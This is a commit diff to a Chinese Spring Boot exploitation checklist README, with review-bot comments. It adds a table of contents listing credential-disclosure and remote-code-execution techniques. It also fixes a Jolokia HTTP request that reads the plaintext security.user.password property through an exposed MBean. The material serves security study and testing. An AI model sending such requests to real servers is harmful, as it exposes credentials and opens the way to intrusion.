
Commit 08bb401

add Table of Contents
1 parent 26009ea commit 08bb401

1 file changed

+100
-1
lines changed


README.md

Lines changed: 100 additions & 1 deletion
@@ -4,6 +4,105 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安
44

55

66

7+
目录
8+
-----------------
9+
10+
* [Spring Boot Vulnerability Exploit CheckList](#spring-boot-vulnerability-exploit-checklist)
11+
* [零:路由和版本](#%E9%9B%B6%E8%B7%AF%E7%94%B1%E5%92%8C%E7%89%88%E6%9C%AC)
12+
* [0x01:路由知识](#0x01%E8%B7%AF%E7%94%B1%E7%9F%A5%E8%AF%86)
13+
* [0x02:版本知识](#0x02%E7%89%88%E6%9C%AC%E7%9F%A5%E8%AF%86)
14+
* [常见组件的版本相互依赖关系:](#%E5%B8%B8%E8%A7%81%E7%BB%84%E4%BB%B6%E7%9A%84%E7%89%88%E6%9C%AC%E7%9B%B8%E4%BA%92%E4%BE%9D%E8%B5%96%E5%85%B3%E7%B3%BB)
15+
* [Spring Cloud 与 Spring Boot 大版本之间的依赖关系:](#spring-cloud-%E4%B8%8E-spring-boot-%E5%A4%A7%E7%89%88%E6%9C%AC%E4%B9%8B%E9%97%B4%E7%9A%84%E4%BE%9D%E8%B5%96%E5%85%B3%E7%B3%BB)
16+
* [Spring Cloud 小版本号的后缀及含义:](#spring-cloud-%E5%B0%8F%E7%89%88%E6%9C%AC%E5%8F%B7%E7%9A%84%E5%90%8E%E7%BC%80%E5%8F%8A%E5%90%AB%E4%B9%89)
17+
* [一:信息泄露](#%E4%B8%80%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2)
18+
* [0x01:路由地址及接口调用详情泄漏](#0x01%E8%B7%AF%E7%94%B1%E5%9C%B0%E5%9D%80%E5%8F%8A%E6%8E%A5%E5%8F%A3%E8%B0%83%E7%94%A8%E8%AF%A6%E6%83%85%E6%B3%84%E6%BC%8F)
19+
* [0x02:配置不当而暴露的路由](#0x02%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E8%80%8C%E6%9A%B4%E9%9C%B2%E7%9A%84%E8%B7%AF%E7%94%B1)
20+
* [0x03:获取被星号脱敏的密码的明文 (方法一)](#0x03%E8%8E%B7%E5%8F%96%E8%A2%AB%E6%98%9F%E5%8F%B7%E8%84%B1%E6%95%8F%E7%9A%84%E5%AF%86%E7%A0%81%E7%9A%84%E6%98%8E%E6%96%87-%E6%96%B9%E6%B3%95%E4%B8%80)
21+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6)
22+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95)
23+
* [步骤一: 找到想要获取的属性名](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%BE%E5%88%B0%E6%83%B3%E8%A6%81%E8%8E%B7%E5%8F%96%E7%9A%84%E5%B1%9E%E6%80%A7%E5%90%8D)
24+
* [步骤二: jolokia 调用 org\.springframework\.cloud\.context\.environment Mbean 获取明文](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-jolokia-%E8%B0%83%E7%94%A8-orgspringframeworkcloudcontextenvironment-mbean-%E8%8E%B7%E5%8F%96%E6%98%8E%E6%96%87)
25+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86)
26+
* [0x04:获取被星号脱敏的密码的明文 (方法二)](#0x04%E8%8E%B7%E5%8F%96%E8%A2%AB%E6%98%9F%E5%8F%B7%E8%84%B1%E6%95%8F%E7%9A%84%E5%AF%86%E7%A0%81%E7%9A%84%E6%98%8E%E6%96%87-%E6%96%B9%E6%B3%95%E4%BA%8C)
27+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-1)
28+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-1)
29+
* [步骤一: 找到想要获取的属性名](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%BE%E5%88%B0%E6%83%B3%E8%A6%81%E8%8E%B7%E5%8F%96%E7%9A%84%E5%B1%9E%E6%80%A7%E5%90%8D-1)
30+
* [步骤二: 使用 nc 监听 HTTP 请求](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-%E4%BD%BF%E7%94%A8-nc-%E7%9B%91%E5%90%AC-http-%E8%AF%B7%E6%B1%82)
31+
* [步骤三: 设置 eureka\.client\.serviceUrl\.defaultZone 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89-%E8%AE%BE%E7%BD%AE-eurekaclientserviceurldefaultzone-%E5%B1%9E%E6%80%A7)
32+
* [步骤四: 刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)
33+
* [步骤五: 解码属性值](#%E6%AD%A5%E9%AA%A4%E4%BA%94-%E8%A7%A3%E7%A0%81%E5%B1%9E%E6%80%A7%E5%80%BC)
34+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-1)
35+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90)
36+
* [二:远程代码执行](#%E4%BA%8C%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C)
37+
* [0x01:whitelabel error page SpEL RCE](#0x01whitelabel-error-page-spel-rce)
38+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-2)
39+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-2)
40+
* [步骤一:找到一个正常传参处](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%89%BE%E5%88%B0%E4%B8%80%E4%B8%AA%E6%AD%A3%E5%B8%B8%E4%BC%A0%E5%8F%82%E5%A4%84)
41+
* [步骤二:执行 SpEL 表达式](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%89%A7%E8%A1%8C-spel-%E8%A1%A8%E8%BE%BE%E5%BC%8F)
42+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-2)
43+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1)
44+
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83)
45+
* [0x02:spring cloud SnakeYAML RCE](#0x02spring-cloud-snakeyaml-rce)
46+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-3)
47+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-3)
48+
* [步骤一: 托管 yml 和 jar 文件](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%98%E7%AE%A1-yml-%E5%92%8C-jar-%E6%96%87%E4%BB%B6)
49+
* [步骤二: 设置 spring\.cloud\.bootstrap\.location 属性](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-%E8%AE%BE%E7%BD%AE-springcloudbootstraplocation-%E5%B1%9E%E6%80%A7)
50+
* [步骤三: 刷新配置](#%E6%AD%A5%E9%AA%A4%E4%B8%89-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)
51+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-3)
52+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-2)
53+
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-1)
54+
* [0x03:eureka xstream deserialization RCE](#0x03eureka-xstream-deserialization-rce)
55+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-4)
56+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-4)
57+
* [步骤一:架设响应恶意 XStream payload 的网站](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9E%B6%E8%AE%BE%E5%93%8D%E5%BA%94%E6%81%B6%E6%84%8F-xstream-payload-%E7%9A%84%E7%BD%91%E7%AB%99)
58+
* [步骤二:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
59+
* [步骤三:设置 eureka\.client\.serviceUrl\.defaultZone 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-eurekaclientserviceurldefaultzone-%E5%B1%9E%E6%80%A7)
60+
* [步骤四:刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)
61+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-4)
62+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-3)
63+
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-2)
64+
* [0x04:Jolokia logback JNDI RCE](#0x04jolokia-logback-jndi-rce)
65+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-5)
66+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-5)
67+
* [步骤一:查看已存在的 MBeans](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-mbeans)
68+
* [步骤二:托管 xml 文件](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%89%98%E7%AE%A1-xml-%E6%96%87%E4%BB%B6)
69+
* [步骤三:准备要执行的 Java 代码](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-java-%E4%BB%A3%E7%A0%81)
70+
* [步骤四:架设恶意 ldap 服务](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-ldap-%E6%9C%8D%E5%8A%A1)
71+
* [步骤五:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
72+
* [步骤六:从外部 URL 地址加载日志配置文件](#%E6%AD%A5%E9%AA%A4%E5%85%AD%E4%BB%8E%E5%A4%96%E9%83%A8-url-%E5%9C%B0%E5%9D%80%E5%8A%A0%E8%BD%BD%E6%97%A5%E5%BF%97%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6)
73+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-5)
74+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-4)
75+
* [0x05:Jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce)
76+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-6)
77+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-6)
78+
* [步骤一:查看已存在的 MBeans](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-mbeans-1)
79+
* [步骤二:准备要执行的 Java 代码](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-java-%E4%BB%A3%E7%A0%81)
80+
* [步骤三:架设恶意 rmi 服务](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rmi-%E6%9C%8D%E5%8A%A1)
81+
* [步骤四:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
82+
* [步骤五:发送恶意 payload](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E5%8F%91%E9%80%81%E6%81%B6%E6%84%8F-payload)
83+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-6)
84+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-5)
85+
* [0x06:h2 database query RCE](#0x06h2-database-query-rce)
86+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-7)
87+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-7)
88+
* [步骤一:设置 spring\.datasource\.hikari\.connection\-test\-query 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E8%AE%BE%E7%BD%AE-springdatasourcehikariconnection-test-query-%E5%B1%9E%E6%80%A7)
89+
* [步骤二:重启应用](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E9%87%8D%E5%90%AF%E5%BA%94%E7%94%A8)
90+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-7)
91+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-6)
92+
* [0x07:mysql jdbc deserialization RCE](#0x07mysql-jdbc-deserialization-rce)
93+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-8)
94+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-8)
95+
* [步骤一:查看环境依赖](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E7%8E%AF%E5%A2%83%E4%BE%9D%E8%B5%96)
96+
* [步骤二:架设恶意 rogue mysql server](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rogue-mysql-server)
97+
* [步骤三:设置 spring\.datasource\.url 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-springdatasourceurl-%E5%B1%9E%E6%80%A7)
98+
* [步骤四:刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE-1)
99+
* [步骤五:触发数据库查询](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E8%A7%A6%E5%8F%91%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9F%A5%E8%AF%A2)
100+
* [步骤六:恢复正常 jdbc url](#%E6%AD%A5%E9%AA%A4%E5%85%AD%E6%81%A2%E5%A4%8D%E6%AD%A3%E5%B8%B8-jdbc-url)
101+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-8)
102+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-7)
103+
104+
105+
7106
## 零:路由和版本
8107

9108
### 0x01:路由知识
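Review bot: the generated link text is inconsistent: several entries carry raw `<strong>` tags inside the link (`* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-3)`) while the same heading elsewhere is plain (`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6)`); the anchors are identical apart from the numeric suffix, so the headings differ only in bold markup, and the tags should be dropped from the TOC entries (or the heading markup unified in the README) so every entry renders the same way. The repeated headings ("利用条件:", "利用方法:", "漏洞原理:", "漏洞分析:", "步骤一: ...") also rely on GitHub's auto-numbered anchors (`-1` through `-8`), which shift silently whenever a section is inserted, removed or reordered, so any later edit to the README must regenerate the whole table; either note that in the README or give the repeated headings distinct titles. Minor: colon style and spacing are mixed between entries (`步骤一: 找到` vs `步骤一:找到`), and the hunk ends with two extra blank lines (104+, 105+) before the first heading where one is enough.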
@@ -214,7 +313,7 @@ spring 1.x
214313

215314
```
216315
POST /jolokia
217-
Content-Type: application/x-www-form-urlencoded
316+
Content-Type: application/json
218317
219318
{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
220319
```
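Review bot: changing the request's Content-Type from application/x-www-form-urlencoded to application/json is the right correction, since the body is a JSON object (the mbean/operation/type/arguments document) and Jolokia's POST interface parses it as JSON; with the old header the body would have been treated as form data. Two points: the commit message ("add Table of Contents") does not mention this unrelated fix, so it belongs in its own commit or at least in the message; and because this example reads a sensitive property (security.user.password) through an exposed EnvironmentManager MBean, the README should state next to it that the mitigation is to keep the jolokia actuator endpoint disabled or behind authentication.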
